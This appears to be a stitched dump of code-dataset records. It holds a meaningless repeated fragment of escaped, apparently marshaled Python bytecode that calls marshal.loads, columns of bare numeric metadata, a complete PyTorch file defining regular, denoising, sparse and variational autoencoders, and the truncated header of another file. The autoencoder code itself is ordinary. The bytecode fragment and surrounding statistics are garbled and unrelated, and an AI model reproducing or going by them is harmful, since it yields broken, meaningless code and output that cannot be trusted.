x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01(\x05\x00\x00\x00t\x05\x00\x00\x00Falset\x03\x00\x00\x00foot\x03\x00\x00\x00bart\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\n\x00\x00\x00\x06\x01\x06\x01\n\x01\r\x01\x0c\x01'))
| 53,500
| 106,985
| 0.748308
| 24,188
| 107,000
| 3.309038
| 0.032578
| 0.356226
| 0.279876
| 0.241082
| 0.904172
| 0.890703
| 0.874736
| 0.864129
| 0.854096
| 0.844138
| 0
| 0.404384
| 0.012112
| 107,000
| 2
| 106,985
| 53,500
| 0.352815
| 0
| 0
| 0
| 0
| 3
| 0.697666
| 0.624789
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 21
|
495286cebf67260e90c5879b2c4f6d369bd9a488
| 6,628
|
py
|
Python
|
margaret/legacy/models/ae.py
|
kpandey008/Margaret
|
402da11c9c9c6730553916cbcd5293c040556a08
|
[
"MIT"
] | 2
|
2021-12-01T15:45:27.000Z
|
2021-12-07T17:17:37.000Z
|
margaret/legacy/models/ae.py
|
kpandey008/Margaret
|
402da11c9c9c6730553916cbcd5293c040556a08
|
[
"MIT"
] | null | null | null |
margaret/legacy/models/ae.py
|
kpandey008/Margaret
|
402da11c9c9c6730553916cbcd5293c040556a08
|
[
"MIT"
] | 2
|
2021-12-16T06:25:51.000Z
|
2022-03-10T23:55:53.000Z
|
import torch
import torch.nn as nn
class AE(nn.Module):
# Implementation of a Regular autoencoder
def __init__(self, infeatures, code_size=10):
super(AE, self).__init__()
self.code_size = code_size
self.infeatures = infeatures
self.relu = nn.ReLU()
# Encoder architecture
self.enc_fc1 = nn.Linear(self.infeatures, 128)
self.enc_bn1 = nn.BatchNorm1d(128)
self.enc_fc2 = nn.Linear(128, 64)
self.enc_bn2 = nn.BatchNorm1d(64)
self.enc_fc3 = nn.Linear(64, self.code_size)
self.enc_bn3 = nn.BatchNorm1d(self.code_size)
# Decoder Architecture
self.dec_fc1 = nn.Linear(self.code_size, 64)
self.dec_bn1 = nn.BatchNorm1d(64)
self.dec_fc2 = nn.Linear(64, 128)
self.dec_bn2 = nn.BatchNorm1d(128)
self.dec_fc3 = nn.Linear(128, self.infeatures)
self.dec_bn3 = nn.BatchNorm1d(self.infeatures)
def encode(self, x):
x = self.relu(self.enc_bn1(self.enc_fc1(x)))
x = self.relu(self.enc_bn2(self.enc_fc2(x)))
x = self.relu(self.enc_bn3(self.enc_fc3(x)))
return x
def decode(self, z):
x = self.relu(self.dec_bn1(self.dec_fc1(z)))
x = self.relu(self.dec_bn2(self.dec_fc2(x)))
output = self.relu(self.dec_bn3(self.dec_fc3(x)))
return output
def forward(self, x):
# Encoder
z = self.encode(x)
# Decoder
out = self.decode(z)
return out
class DAE(nn.Module):
# Implementation of the Denoising Autoencoder
def __init__(self, infeatures, code_size=10, noise_std=1.0):
super(DAE, self).__init__()
self.code_size = code_size
self.infeatures = infeatures
self.relu = nn.ReLU()
self.noise_std = noise_std
# Encoder architecture
self.enc_fc1 = nn.Linear(self.infeatures, 128)
self.enc_bn1 = nn.BatchNorm1d(128)
self.enc_fc2 = nn.Linear(128, 64)
self.enc_bn2 = nn.BatchNorm1d(64)
self.enc_fc3 = nn.Linear(64, self.code_size)
self.enc_bn3 = nn.BatchNorm1d(self.code_size)
# Decoder Architecture
self.dec_fc1 = nn.Linear(self.code_size, 64)
self.dec_bn1 = nn.BatchNorm1d(64)
self.dec_fc2 = nn.Linear(64, 128)
self.dec_bn2 = nn.BatchNorm1d(128)
self.dec_fc3 = nn.Linear(128, self.infeatures)
self.dec_bn3 = nn.BatchNorm1d(self.infeatures)
def encode(self, x):
x = self.relu(self.enc_bn1(self.enc_fc1(x)))
x = self.relu(self.enc_bn2(self.enc_fc2(x)))
x = self.relu(self.enc_bn3(self.enc_fc3(x)))
return x
def decode(self, z):
x = self.relu(self.dec_bn1(self.dec_fc1(z)))
x = self.relu(self.dec_bn2(self.dec_fc2(x)))
output = self.relu(self.dec_bn3(self.dec_fc3(x)))
return output
def forward(self, x):
# Add some noise to the input
x = x + self.noise_std * torch.randn_like(x)
# Encoder
z = self.encode(x)
# Decoder
out = self.decode(z)
return out
class SparseAE(nn.Module):
# Implementation of the Sparse Autoencoder
def __init__(self, infeatures, code_size=10, noise_std=1.0):
super(SparseAE, self).__init__()
self.code_size = code_size
self.infeatures = infeatures
self.relu = nn.ReLU()
self.noise_std = noise_std
# Encoder architecture
self.enc_fc1 = nn.Linear(self.infeatures, 128)
self.enc_bn1 = nn.BatchNorm1d(128)
self.enc_fc2 = nn.Linear(128, 64)
self.enc_bn2 = nn.BatchNorm1d(64)
self.enc_fc3 = nn.Linear(64, self.code_size)
self.enc_bn3 = nn.BatchNorm1d(self.code_size)
# Decoder Architecture
self.dec_fc1 = nn.Linear(self.code_size, 64)
self.dec_bn1 = nn.BatchNorm1d(64)
self.dec_fc2 = nn.Linear(64, 128)
self.dec_bn2 = nn.BatchNorm1d(128)
self.dec_fc3 = nn.Linear(128, self.infeatures)
self.dec_bn3 = nn.BatchNorm1d(self.infeatures)
def encode(self, x):
x = self.relu(self.enc_bn1(self.enc_fc1(x)))
x = self.relu(self.enc_bn2(self.enc_fc2(x)))
x = self.relu(self.enc_bn3(self.enc_fc3(x)))
return x
def decode(self, z):
x = self.relu(self.dec_bn1(self.dec_fc1(z)))
x = self.relu(self.dec_bn2(self.dec_fc2(x)))
output = self.relu(self.dec_bn3(self.dec_fc3(x)))
return output
def forward(self, x):
# Add some noise to the input
x = x + self.noise_std * torch.randn_like(x)
# Encoder
z = self.encode(x)
# Decoder
out = self.decode(z)
return z, out
class VAE(nn.Module):
# Implementation of a Variational Autoencoder
def __init__(self, infeatures, code_size=10):
super(VAE, self).__init__()
self.code_size = code_size
self.infeatures = infeatures
self.relu = nn.ReLU()
# Encoder architecture
self.enc_fc1 = nn.Linear(self.infeatures, 128)
self.enc_bn1 = nn.BatchNorm1d(128)
self.enc_fc2 = nn.Linear(128, 64)
self.enc_bn2 = nn.BatchNorm1d(64)
self.enc_fc31 = nn.Linear(64, self.code_size)
self.enc_fc32 = nn.Linear(64, self.code_size)
self.dropout = nn.Dropout(0.1)
# Decoder Architecture
self.dec_fc1 = nn.Linear(self.code_size, 64)
self.dec_bn1 = nn.BatchNorm1d(64)
self.dec_fc2 = nn.Linear(64, 128)
self.dec_bn2 = nn.BatchNorm1d(128)
self.dec_fc3 = nn.Linear(128, self.infeatures)
def encode(self, x):
x = self.relu(self.enc_bn1(self.enc_fc1(x)))
x = self.relu(self.enc_bn2(self.enc_fc2(x)))
x = self.dropout(x)
return self.enc_fc31(x), self.enc_fc32(x)
def decode(self, z):
x = self.relu(self.dec_bn1(self.dec_fc1(z)))
x = self.relu(self.dec_bn2(self.dec_fc2(x)))
output = self.dec_fc3(x)
return output
def reparameterize(self, mu, logvar):
std = torch.exp(0.5 * logvar)
eps = torch.randn_like(std)
return mu + eps * std
def forward(self, x):
# Encoder
mu, logvar = self.encode(x)
# Reparameterization Trick
z = self.reparameterize(mu, logvar)
# Decoder
decoder_out = self.decode(z)
return z, decoder_out, mu, logvar
if __name__ == "__main__":
ae = AE(infeatures=100)
dae = DAE(infeatures=100)
vae = VAE(infeatures=100)
input = torch.randn((32, 100))
print(ae(input).shape)
print(dae(input).shape)
print(vae(input)[1].shape)
| 31.712919
| 64
| 0.607725
| 962
| 6,628
| 4.009356
| 0.082121
| 0.087114
| 0.068447
| 0.064039
| 0.875292
| 0.842624
| 0.842624
| 0.82266
| 0.815141
| 0.79077
| 0
| 0.056312
| 0.268558
| 6,628
| 208
| 65
| 31.865385
| 0.739274
| 0.072571
| 0
| 0.77551
| 0
| 0
| 0.001307
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.115646
| false
| 0
| 0.013605
| 0
| 0.244898
| 0.020408
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b8e1a79399985d5471b8dd5edc0e6fffd7ed855f
| 11,497
|
py
|
Python
|
models/encoders_decoders.py
|
BobakBaghi/McGillPhysHackathon2020
|
c4c6c2d4c3b89d2750e1184059d9cb446cbd03d7
|
[
"MIT"
] | 1
|
2020-11-08T17:29:01.000Z
|
2020-11-08T17:29:01.000Z
|
models/encoders_decoders.py
|
BobakBaghi/McGillPhysHackathon2020
|
